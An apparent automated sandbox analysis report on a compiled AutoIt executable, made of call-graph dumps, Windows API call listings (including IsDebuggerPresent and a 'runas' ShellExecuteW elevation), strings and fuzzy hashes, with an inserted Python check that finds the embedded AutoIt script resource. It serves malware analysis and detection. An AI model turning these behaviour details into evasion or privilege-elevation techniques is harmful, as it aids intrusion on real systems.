93677->93679 93678->93638 93680 eea93a 93679->93680 93681 eea928 InitializeCriticalSectionAndSpinCount 93679->93681 93682 eea970 ___lock_fhandle LeaveCriticalSection 93680->93682 93681->93680 93682->93675 93684 eeaba4 __chsize_nolock 47 API calls 93683->93684 93686 eeeaaa 93684->93686 93685 eeeb00 93688 eeab1e __free_osfhnd 48 API calls 93685->93688 93686->93685 93687 eeeade 93686->93687 93689 eeaba4 __chsize_nolock 47 API calls 93686->93689 93687->93685 93690 eeaba4 __chsize_nolock 47 API calls 93687->93690 93691 eeeb08 93688->93691 93692 eeead5 93689->93692 93693 eeeaea CloseHandle 93690->93693 93694 eeeb2a 93691->93694 93695 ee7bed __dosmaperr 47 API calls 93691->93695 93696 eeaba4 __chsize_nolock 47 API calls 93692->93696 93693->93685 93697 eeeaf6 GetLastError 93693->93697 93694->93645 93695->93694 93696->93687 93697->93685 93698->93630 93699->93643 93700->93645 93701->93643 93702->93633 93703->93637 93704->93643 93705->92996 93706->93003 93707->93013 93708->93013 93709->93014 93710->93027 93711->93029 93712->93025 93713->93034 93714->93039 93715->93053 93716->93047 93776 eef8a0 93717->93776 93720 ec6a63 48 API calls 93721 ec6643 93720->93721 93778 ec6571 93721->93778 93724 ec40a7 93725 eef8a0 __ftell_nolock 93724->93725 93726 ec40b4 GetLongPathNameW 93725->93726 93727 ec6a63 48 API calls 93726->93727 93728 ec40dc 93727->93728 93729 ec49a0 93728->93729 93730 ecd7f7 48 API calls 93729->93730 93731 ec49b2 93730->93731 93732 ec660f 49 API calls 93731->93732 93733 ec49bd 93732->93733 93734 ec49c8 93733->93734 93738 f32e35 93733->93738 93735 ec64cf 48 API calls 93734->93735 93737 ec49d4 93735->93737 93786 ec28a6 93737->93786 93740 f32e4f 93738->93740 93792 edd35e 60 API calls 93738->93792 93741 ec49e7 Mailbox 93741->92798 93743 ec41a9 136 API calls 93742->93743 93744 ec415e 93743->93744 93745 f33489 93744->93745 93746 ec41a9 136 API calls 93744->93746 93747 f0c396 122 API calls 93745->93747 93748 ec4172 93746->93748 93749 f3349e 93747->93749 93748->93745 93750 
ec417a 93748->93750 93751 f334a2 93749->93751 93752 f334bf 93749->93752 93754 f334aa 93750->93754 93755 ec4186 93750->93755 93756 ec4252 84 API calls 93751->93756 93753 edf4ea 48 API calls 93752->93753 93775 f33504 Mailbox 93753->93775 93881 f06b49 87 API calls _wprintf 93754->93881 93793 ecc833 93755->93793 93756->93754 93760 f334b8 93760->93752 93761 f336b4 93762 ee1c9d _free 47 API calls 93761->93762 93763 f336bc 93762->93763 93764 ec4252 84 API calls 93763->93764 93769 f336c5 93764->93769 93768 ee1c9d _free 47 API calls 93768->93769 93769->93768 93770 ec4252 84 API calls 93769->93770 93887 f025b5 86 API calls 4 library calls 93769->93887 93770->93769 93772 ecce19 48 API calls 93772->93775 93775->93761 93775->93769 93775->93772 93882 f02551 48 API calls ___crtGetEnvironmentStringsW 93775->93882 93883 f02472 60 API calls 2 library calls 93775->93883 93884 f09c12 48 API calls 93775->93884 93885 ecba85 48 API calls ___crtGetEnvironmentStringsW 93775->93885 93886 ec4dd9 48 API calls 93775->93886 93777 ec661c GetFullPathNameW 93776->93777 93777->93720 93779 ec657f 93778->93779 93782 ecb18b 93779->93782 93781 ec4114 93781->93724 93783 ecb199 93782->93783 93785 ecb1a2 ___crtGetEnvironmentStringsW 93782->93785 93784 ecbdfa 48 API calls 93783->93784 93783->93785 93784->93785 93785->93781 93787 ec28b8 93786->93787 93791 ec28d7 ___crtGetEnvironmentStringsW 93786->93791 93789 edf4ea 48 API calls 93787->93789 93788 edf4ea 48 API calls 93790 ec28ee 93788->93790 93789->93791 93790->93741 93791->93788 93792->93738 93794 ecc843 __ftell_nolock 93793->93794 93795 f33095 93794->93795 93796 ecc860 93794->93796 93929 f025b5 86 API calls 4 library calls 93795->93929 93893 ec48ba 49 API calls 93796->93893 93799 ecc882 93894 ec4550 93799->93894 93800 f330a8 93930 f025b5 86 API calls 4 library calls 93800->93930 93804 ecc89f 93806 ecd7f7 48 API calls 93804->93806 93805 f330c4 93808 ecc90c 93805->93808 93807 ecc8ab 93806->93807 93905 ede968 49 API calls __ftell_nolock 93807->93905 93810 
f330d7 93808->93810 93811 ecc91a 93808->93811 93814 ec4907 CloseHandle 93810->93814 93915 ee1dfc 93811->93915 93812 ecc8b7 93815 ecd7f7 48 API calls 93812->93815 93816 f330e3 93814->93816 93817 ecc8c3 93815->93817 93818 ec41a9 136 API calls 93816->93818 93819 ec660f 49 API calls 93817->93819 93820 f3310d 93818->93820 93821 ecc8d1 93819->93821 93823 f33136 93820->93823 93828 f0c396 122 API calls 93820->93828 93906 edeb66 SetFilePointerEx ReadFile 93821->93906 93822 ecc943 _wcscat _wcscpy 93827 ecc96d SetCurrentDirectoryW 93822->93827 93931 f025b5 86 API calls 4 library calls 93823->93931 93825 ecc8fd 93907 ec46ce 93825->93907 93831 edf4ea 48 API calls 93827->93831 93832 f33129 93828->93832 93830 f3314d 93865 eccad1 Mailbox 93830->93865 93833 ecc988 93831->93833 93834 f33152 93832->93834 93835 f33131 93832->93835 93837 ec47b7 48 API calls 93833->93837 93836 ec4252 84 API calls 93834->93836 93838 ec4252 84 API calls 93835->93838 93839 f33157 93836->93839 93868 ecc993 Mailbox __NMSG_WRITE 93837->93868 93838->93823 93840 edf4ea 48 API calls 93839->93840 93847 f33194 93840->93847 93841 ecca9d 93925 ec4907 93841->93925 93845 ec3d98 93845->92666 93845->92689 93846 eccaa9 SetCurrentDirectoryW 93846->93865 93932 ecba85 48 API calls ___crtGetEnvironmentStringsW 93847->93932 93851 f333ce 93938 f09b72 48 API calls 93851->93938 93852 f33467 93942 f025b5 86 API calls 4 library calls 93852->93942 93856 f33480 93856->93841 93857 f333f0 93939 f229e8 48 API calls ___crtGetEnvironmentStringsW 93857->93939 93859 f333fd 93861 ee1c9d _free 47 API calls 93859->93861 93860 f3345f 93941 f0240b 48 API calls 3 library calls 93860->93941 93861->93865 93863 ecce19 48 API calls 93863->93868 93888 ec48dd 93865->93888 93868->93841 93868->93852 93868->93860 93868->93863 93918 ecb337 56 API calls _wcscpy 93868->93918 93919 edc258 GetStringTypeW 93868->93919 93920 eccb93 59 API calls __wcsnicmp 93868->93920 93921 eccb5a GetStringTypeW __NMSG_WRITE 93868->93921 93922 ee16d0 GetStringTypeW wcstoxq 
93868->93922 93923 eccc24 162 API calls 3 library calls 93868->93923 93924 edc682 48 API calls 93868->93924 93872 ecce19 48 API calls 93878 f331dd Mailbox 93872->93878 93875 f33420 93940 f025b5 86 API calls 4 library calls 93875->93940 93877 f33439 93879 ee1c9d _free 47 API calls 93877->93879 93878->93851 93878->93872 93878->93875 93933 f02551 48 API calls ___crtGetEnvironmentStringsW 93878->93933 93934 f02472 60 API calls 2 library calls 93878->93934 93935 f09c12 48 API calls 93878->93935 93936 ecba85 48 API calls ___crtGetEnvironmentStringsW 93878->93936 93937 edc682 48 API calls 93878->93937 93880 f3344c 93879->93880 93880->93865 93881->93760 93882->93775 93883->93775 93884->93775 93885->93775 93886->93775 93887->93769 93889 ec4907 CloseHandle 93888->93889 93890 ec48e5 Mailbox 93889->93890 93891 ec4907 CloseHandle 93890->93891 93892 ec48fc 93891->93892 93892->93845 93893->93799 93895 ec4907 CloseHandle 93894->93895 93896 ec455b 93895->93896 93943 ec47ff 93896->93943 93900 ec458d 93971 ec45be SetFilePointerEx SetFilePointerEx 93900->93971 93902 ec4594 93972 ec4845 SetFilePointerEx SetFilePointerEx WriteFile 93902->93972 93904 ec459b 93904->93800 93904->93804 93905->93812 93906->93825 93913 ec46e8 93907->93913 93908 f340d0 93986 ec4798 SetFilePointerEx 93908->93986 93909 ec476d SetFilePointerEx 93985 ec4798 SetFilePointerEx 93909->93985 93912 f340ea 93913->93908 93913->93909 93914 ec4743 93913->93914 93914->93808 93987 ee1e46 93915->93987 93918->93868 93919->93868 93920->93868 93921->93868 93922->93868 93923->93868 93924->93868 93926 ec4920 93925->93926 93927 ec4911 93925->93927 93926->93927 93928 ec4925 CloseHandle 93926->93928 93927->93846 93928->93927 93929->93800 93930->93805 93931->93830 93932->93878 93933->93878 93934->93878 93935->93878 93936->93878 93937->93878 93938->93857 93939->93859 93940->93877 93941->93852 93942->93856 93944 ec4818 CreateFileW 93943->93944 93945 f3406e 93943->93945 93946 ec4582 93944->93946 93945->93946 93947 f34074 CreateFileW 
93945->93947 93946->93904 93951 ec45d5 93946->93951 93947->93946 93948 f3409a 93947->93948 93949 ec46ce 2 API calls 93948->93949 93950 f340a5 93949->93950 93950->93946 93952 ec45f5 93951->93952 93953 ec46ce 2 API calls 93952->93953 93960 ec464e 93952->93960 93961 ec46a2 93952->93961 93954 ec462d 93953->93954 93955 edf4ea 48 API calls 93954->93955 93956 ec4638 93955->93956 93957 ec47b7 48 API calls 93956->93957 93959 ec4642 93957->93959 93958 ec46ce 2 API calls 93958->93961 93973 ecc2e0 93959->93973 93963 ec4689 93960->93963 93964 ec46ce 2 API calls 93960->93964 93961->93900 93963->93958 93965 f33e0a 93964->93965 93979 ec35fe 93965->93979 93968 edf4ea 48 API calls 93969 f33e19 93968->93969 93970 ecc2e0 2 API calls 93969->93970 93970->93963 93971->93902 93972->93904 93974 ecc354 93973->93974 93978 ecc2ee 93973->93978 93984 ec45a6 SetFilePointerEx 93974->93984 93975 ecc317 93975->93960 93977 ecc327 ReadFile 93977->93975 93977->93978 93978->93975 93978->93977 93980 ec46ce 2 API calls 93979->93980 93981 ec361f 93980->93981 93982 ec46ce 2 API calls 93981->93982 93983 ec3633 93982->93983 93983->93968 93984->93978 93985->93914 93986->93912 93988 ee1e61 93987->93988 93991 ee1e55 93987->93991 94011 ee7c0e 47 API calls __getptd_noexit 93988->94011 93990 ee2019 93993 ee1e41 93990->93993 94012 ee6e10 8 API calls __gmtime64_s 93990->94012 93991->93988 93994 ee1ed4 93991->93994 94006 ee9d6b 47 API calls 2 library calls 93991->94006 93993->93822 93994->93988 94001 ee1f41 93994->94001 94007 ee9d6b 47 API calls 2 library calls 93994->94007 93996 ee1fa0 93996->93988 93996->93993 93997 ee1fb0 93996->93997 94010 ee9d6b 47 API calls 2 library calls 93997->94010 93998 ee1f5f 93998->93988 93999 ee1f7b 93998->93999 94008 ee9d6b 47 API calls 2 library calls 93998->94008 93999->93988 93999->93993 94003 ee1f91 93999->94003 94001->93996 94001->93998 94009 ee9d6b 47 API calls 2 library calls 94003->94009 94006->93994 94007->94001 94008->93999 94009->93993 94010->93993 94011->93990 94012->93993 
94014 edf4ea 48 API calls 94013->94014 94015 ec6b54 94014->94015 94015->92809 94016->92811 94018 ec4c8b 94017->94018 94023 ec4d94 94017->94023 94019 edf4ea 48 API calls 94018->94019 94018->94023 94020 ec4cb2 94019->94020 94021 edf4ea 48 API calls 94020->94021 94022 ec4d22 94021->94022 94022->94023 94030 ecb470 94022->94030 94058 ec4dd9 48 API calls 94022->94058 94059 f09af1 48 API calls 94022->94059 94060 ecba85 48 API calls ___crtGetEnvironmentStringsW 94022->94060 94023->92815 94028->92817 94029->92819 94061 ec6b0f 94030->94061 94032 ecb69b 94073 ecba85 48 API calls ___crtGetEnvironmentStringsW 94032->94073 94034 ecb6b5 Mailbox 94034->94022 94037 f3397b 94077 f026bc 88 API calls 4 library calls 94037->94077 94038 f33939 ___crtGetEnvironmentStringsW 94076 f026bc 88 API calls 4 library calls 94038->94076 94039 ecbcce 48 API calls 94041 ecb495 94039->94041 94041->94032 94041->94037 94041->94038 94041->94039 94047 ecba85 48 API calls 94041->94047 94049 ecb9e4 94041->94049 94050 f33909 94041->94050 94055 ecbdfa 48 API calls 94041->94055 94066 ecc413 59 API calls 94041->94066 94067 ecbb85 94041->94067 94072 ecbc74 48 API calls 94041->94072 94074 ecc6a5 49 API calls 94041->94074 94075 ecc799 48 API calls ___crtGetEnvironmentStringsW 94041->94075 94045 f33989 94078 ecba85 48 API calls ___crtGetEnvironmentStringsW 94045->94078 94046 f33973 94046->94034 94047->94041 94079 f026bc 88 API calls 4 library calls 94049->94079 94052 ec6b4a 48 API calls 94050->94052 94053 f33914 94052->94053 94057 edf4ea 48 API calls 94053->94057 94056 ecb66c CharUpperBuffW 94055->94056 94056->94041 94057->94038 94058->94022 94059->94022 94060->94022 94062 edf4ea 48 API calls 94061->94062 94063 ec6b34 94062->94063 94064 ec6b4a 48 API calls 94063->94064 94065 ec6b43 94064->94065 94065->94041 94066->94041 94068 ecbb9b 94067->94068 94071 ecbb96 ___crtGetEnvironmentStringsW 94067->94071 94069 f31b77 94068->94069 94070 edee75 48 API calls 94068->94070 94070->94071 94071->94041 94072->94041 94073->94034 
[Execution graph, rendered as an image on the original page; the node/edge list is not reproduced. Windows API calls named on the graph nodes of the ec0000 image: LoadImageW, EnumResourceNamesW, RegisterClassExW, DestroyIcon, LoadStringW, InterlockedDecrement, GetFileAttributesW, FindFirstFileW, FindClose, GetPEB, Sleep, GetStdHandle, CoInitialize, CreateThread, CloseHandle, RegisterWindowMessageW, GetVersionExW, GetCurrentProcess, LoadLibraryA, GetProcAddress, GetSystemInfo, GetNativeSystemInfo, FreeLibrary, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetFullPathNameW, PostQuitMessage, DefWindowProcW, SetTimer, CreatePopupMenu, KillTimer, Shell_NotifyIconW, MoveWindow, SetFocus, DeleteObject, DestroyWindow, SetFilePointerEx, ReadFile, GetLastError, CharUpperBuffW, CharLowerBuffW, TerminateProcess, VirtualProtect, MultiByteToWideChar.]

Control-flow Graph

[Rendered basic-block graph (executed / not-executed colouring) for the function spanning eeb043-eeb86c; the edge list is not reproduced. API calls on its nodes: GetConsoleMode, GetConsoleCP, WideCharToMultiByte, WriteFile, GetLastError.]
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• Opcode ID: e9c56c3d64026c76b1842a0c0c9647a1a864d5bf5c5c82a581548e1e6087ac12
• Instruction ID: f544380ad3609d180b4da7e4f57d099f5875ed85e877414895673c81ea66f556
• Opcode Fuzzy Hash: e9c56c3d64026c76b1842a0c0c9647a1a864d5bf5c5c82a581548e1e6087ac12
• Instruction Fuzzy Hash: 49326B75B022AC8BDB248F55DC816EAB7F5FB46314F1851D9E80AE7A81D7309E80CF52

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00EC3AA3,?), ref: 00EC3D45
• IsDebuggerPresent.KERNEL32(?,?,?,?,00EC3AA3,?), ref: 00EC3D57
• GetFullPathNameW.KERNEL32(00007FFF,?,?,00F81148,00F81130,?,?,?,?,00EC3AA3,?), ref: 00EC3DC8
  • Part of subcall function 00EC6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00EC3DEE,00F81148,?,?,?,?,?,00EC3AA3,?), ref: 00EC6471
• SetCurrentDirectoryW.KERNEL32(?,?,?,00EC3AA3,?), ref: 00EC3E48
• MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00F728F4,00000010), ref: 00F31CCE
• SetCurrentDirectoryW.KERNEL32(?,00F81148,?,?,?,?,?,00EC3AA3,?), ref: 00F31D06
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F5DAB4,00F81148,?,?,?,?,?,00EC3AA3,?), ref: 00F31D89
• ShellExecuteW.SHELL32(00000000,?,?,?,?,00EC3AA3), ref: 00F31D90
  • Part of subcall function 00EC3E6E: GetSysColorBrush.USER32(0000000F), ref: 00EC3E79
  • Part of subcall function 00EC3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00EC3E88
  • Part of subcall function 00EC3E6E: LoadIconW.USER32(00000063), ref: 00EC3E9E
  • Part of subcall function 00EC3E6E: LoadIconW.USER32(000000A4), ref: 00EC3EB0
  • Part of subcall function 00EC3E6E: LoadIconW.USER32(000000A2), ref: 00EC3EC2
  • Part of subcall function 00EC3E6E: RegisterClassExW.USER32(?), ref: 00EC3F30
  • Part of subcall function 00EC36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00EC36E6
  • Part of subcall function 00EC36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00EC3707
  • Part of subcall function 00EC36B8: ShowWindow.USER32(00000000,?,?,?,?,00EC3AA3,?), ref: 00EC371B
  • Part of subcall function 00EC36B8: ShowWindow.USER32(00000000,?,?,?,?,00EC3AA3,?), ref: 00EC3724
  • Part of subcall function 00EC4FFC: _memset.LIBCMT ref: 00EC5022
  • Part of subcall function 00EC4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00EC50CB
Strings
• This is a third-party compiled AutoIt script., xrefs: 00F31CC8
• runas, xrefs: 00F31D84
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
• String ID: This is a third-party compiled AutoIt script.$runas
• API String ID: 438480954-3287110873

Control-flow Graph (graph image omitted; legend: Executed / Not Executed)
APIs
• GetVersionExW.KERNEL32(?), ref: 00EDDDEC
• GetCurrentProcess.KERNEL32(00000000,00F5DC38,?,?), ref: 00EDDEAC
• GetNativeSystemInfo.KERNELBASE(?,00F5DC38,?,?), ref: 00EDDF01
• FreeLibrary.KERNEL32(00000000,?,?), ref: 00EDDF0C
• FreeLibrary.KERNEL32(00000000,?,?), ref: 00EDDF1F
• GetSystemInfo.KERNEL32(?,00F5DC38,?,?), ref: 00EDDF29
• GetSystemInfo.KERNEL32(?,00F5DC38,?,?), ref: 00EDDF35
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
• String ID:
• API String ID: 3851250370-0

Control-flow Graph (graph image omitted; legend: Executed / Not Executed)
APIs
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00EC449E,?,?,00000000,00000001), ref: 00EC407B
• FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00EC449E,?,?,00000000,00000001), ref: 00EC4092
• LoadResource.KERNEL32(?,00000000,?,?,00EC449E,?,?,00000000,00000001,?,?,?,?,?,?,00EC41FB), ref: 00F34F1A
• SizeofResource.KERNEL32(?,00000000,?,?,00EC449E,?,?,00000000,00000001,?,?,?,?,?,?,00EC41FB), ref: 00F34F2F
• LockResource.KERNEL32(00EC449E,?,?,00EC449E,?,?,00000000,00000001,?,?,?,?,?,?,00EC41FB,00000000), ref: 00F34F42
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                                      • String ID: SCRIPT
                                                                                                                                                                                                                                                      • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                                      • Opcode ID: 69e2c053aa5b38c4a5e7818b283a76fbb1216d08f91428790b8d7868505aa0ec
                                                                                                                                                                                                                                                      • Instruction ID: 99fe18d6f6e9f50bb2ac2e2c9ab77ccda75d4c1e8e73c8366ddcfe9be575fb56
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 69e2c053aa5b38c4a5e7818b283a76fbb1216d08f91428790b8d7868505aa0ec
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A118EB5240705BFE7218B25ED49F677BB9EBC6B51F14412CFA02962E0DBB2DC01DA21
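The resource API sequence above (FindResource, LoadResource, LockResource, SizeofResource, CreateStreamOnHGlobal) paired with the string "SCRIPT" is the AutoIt v3 runtime fetching its compiled script, which is stored as an RT_RCDATA resource named "SCRIPT". The following is an added triage check, not code from the report or from Joe Sandbox: it walks a PE resource directory by hand (no pefile dependency) and reports whether such a resource exists. The PE header and resource-tree layouts used are the standard IMAGE_RESOURCE_DIRECTORY / IMAGE_RESOURCE_DATA_ENTRY structures; the sample resource blob is constructed in the block and is not taken from the analysed file. The check is a heuristic: a packed or renamed resource section will not be detected this way.

```python
"""Triage check for a compiled AutoIt v3 script resource (added example).

Compiled AutoIt binaries store the script as an RT_RCDATA resource named
"SCRIPT"; the FindResource/LoadResource/LockResource/SizeofResource sequence
in the report is the runtime fetching it. Sample input below is constructed,
not taken from the analysed file.
"""
import struct

RT_RCDATA = 10


def _dir_entries(rsrc, off):
    """Yield (name_or_id, target_offset, is_subdir) for one IMAGE_RESOURCE_DIRECTORY.

    Offsets inside the resource tree are relative to the start of the resource
    section, which is why walking the section bytes alone is enough.
    """
    n_named, n_id = struct.unpack_from("<HH", rsrc, off + 12)
    pos = off + 16
    for _ in range(n_named + n_id):
        name, data = struct.unpack_from("<II", rsrc, pos)
        pos += 8
        if name & 0x80000000:  # high bit set: offset to IMAGE_RESOURCE_DIR_STRING_U
            s = name & 0x7FFFFFFF
            length = struct.unpack_from("<H", rsrc, s)[0]
            ident = rsrc[s + 2: s + 2 + 2 * length].decode("utf-16-le")
        else:
            ident = name
        yield ident, data & 0x7FFFFFFF, bool(data & 0x80000000)


def walk_resources(rsrc):
    """Return [(type, name, lang, data_rva, size)] for every leaf of the type/name/lang tree."""
    leaves = []
    for rtype, t_off, t_sub in _dir_entries(rsrc, 0):
        if not t_sub:
            continue
        for rname, n_off, n_sub in _dir_entries(rsrc, t_off):
            if not n_sub:
                continue
            for lang, l_off, l_sub in _dir_entries(rsrc, n_off):
                if l_sub:
                    continue
                rva, size = struct.unpack_from("<II", rsrc, l_off)  # IMAGE_RESOURCE_DATA_ENTRY
                leaves.append((rtype, rname, lang, rva, size))
    return leaves


def has_autoit_script_resource(rsrc):
    """True if an RT_RCDATA resource named "SCRIPT" exists (heuristic, not proof)."""
    return any(t == RT_RCDATA and n == "SCRIPT" for t, n, _l, _r, _s in walk_resources(rsrc))


def rsrc_from_pe(pe):
    """Locate the resource directory in raw PE file bytes and return its bytes."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    n_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", pe, opt)[0]
    dd = opt + (96 if magic == 0x10B else 112)         # data directories: PE32 vs PE32+
    rva, size = struct.unpack_from("<II", pe, dd + 2 * 8)  # index 2 = resource table
    sect = opt + opt_size
    for i in range(n_sections):
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", pe, sect + i * 40 + 8)
        if va <= rva < va + max(vsize, rawsize):
            return pe[rawptr + (rva - va): rawptr + (rva - va) + size]
    raise ValueError("resource directory not mapped to any section")


def build_sample_rsrc(name="SCRIPT"):
    """Constructed .rsrc blob: RT_RCDATA -> <name> -> lang 0x409 -> one data entry."""
    def directory(entries):
        n_named = sum(1 for n, _ in entries if n & 0x80000000)
        hdr = struct.pack("<IIHHHH", 0, 0, 0, 0, n_named, len(entries) - n_named)
        return hdr + b"".join(struct.pack("<II", n, o) for n, o in entries)
    # fixed layout: root 0x00, type dir 0x18, lang dir 0x30, data entry 0x48, name string 0x58
    root = directory([(RT_RCDATA, 0x80000000 | 0x18)])
    type_dir = directory([(0x80000000 | 0x58, 0x80000000 | 0x30)])
    lang_dir = directory([(0x409, 0x48)])
    data_entry = struct.pack("<IIII", 0x3000, 0x1234, 0, 0)  # RVA, size, codepage, reserved
    name_str = struct.pack("<H", len(name)) + name.encode("utf-16-le")
    return root + type_dir + lang_dir + data_entry + name_str


if __name__ == "__main__":
    import sys
    blob = rsrc_from_pe(open(sys.argv[1], "rb").read()) if len(sys.argv) > 1 else build_sample_rsrc()
    for leaf in walk_resources(blob):
        print(leaf)
    print("AutoIt SCRIPT resource present:", has_autoit_script_resource(blob))
```

Run it with a file path to inspect a real sample, or with no argument to exercise the constructed blob. The resource walk is the static counterpart of the FindResource/LoadResource calls the sandbox observed at runtime; once the leaf is found, its data RVA and size give the exact bytes the interpreter will load, which is what an AutoIt decompiler would then consume.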
APIs
• GetFileAttributesW.KERNELBASE(?,00F32F49), ref: 00F06CB9
• FindFirstFileW.KERNELBASE(?,?), ref: 00F06CCA
• FindClose.KERNEL32(00000000), ref: 00F06CDA
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirst
• String ID:
• API String ID: 48322524-0
• Opcode ID: 958210efeac4d38342823f64fdb7ebdbff00cdc81dbb0c407d37dd7d67c96b20
• Instruction ID: 7991342f6d0492679578e56c70a584c731f006118b4006f88aeec94b3ba82b02
• Opcode Fuzzy Hash: 958210efeac4d38342823f64fdb7ebdbff00cdc81dbb0c407d37dd7d67c96b20
• Instruction Fuzzy Hash: 23E0D83581041457E2146738EC0D4E937ACDB5633AF104709FD71C11D0E770D91075D5
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ECE959
• timeGetTime.WINMM ref: 00ECEBFA
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ECED2E
• TranslateMessage.USER32(?), ref: 00ECED3F
• DispatchMessageW.USER32(?), ref: 00ECED4A
• LockWindowUpdate.USER32(00000000), ref: 00ECED79
• DestroyWindow.USER32 ref: 00ECED85
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00ECED9F
• Sleep.KERNEL32(0000000A), ref: 00F35270
• TranslateMessage.USER32(?), ref: 00F359F7
• DispatchMessageW.USER32(?), ref: 00F35A05
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F35A19
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
• String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
• API String ID: 2641332412-570651680
• Opcode ID: 6ce659b608d9df88bddf920031ba82ba6b9f1ac38cf0a090026c38872432d6e0
• Instruction ID: 55db568c412d1b60f9ad6f438f35d0d1cb52f31216162527e3a7fa04cc43356a
• Opcode Fuzzy Hash: 6ce659b608d9df88bddf920031ba82ba6b9f1ac38cf0a090026c38872432d6e0
• Instruction Fuzzy Hash: 9062E070504340CFDB24DF24C985FAAB7E4BF84714F08196DE986AB392DB72D846DB52
APIs
• ___createFile.LIBCMT ref: 00EF5EC3
• ___createFile.LIBCMT ref: 00EF5F04
• GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00EF5F2D
• __dosmaperr.LIBCMT ref: 00EF5F34
• GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00EF5F47
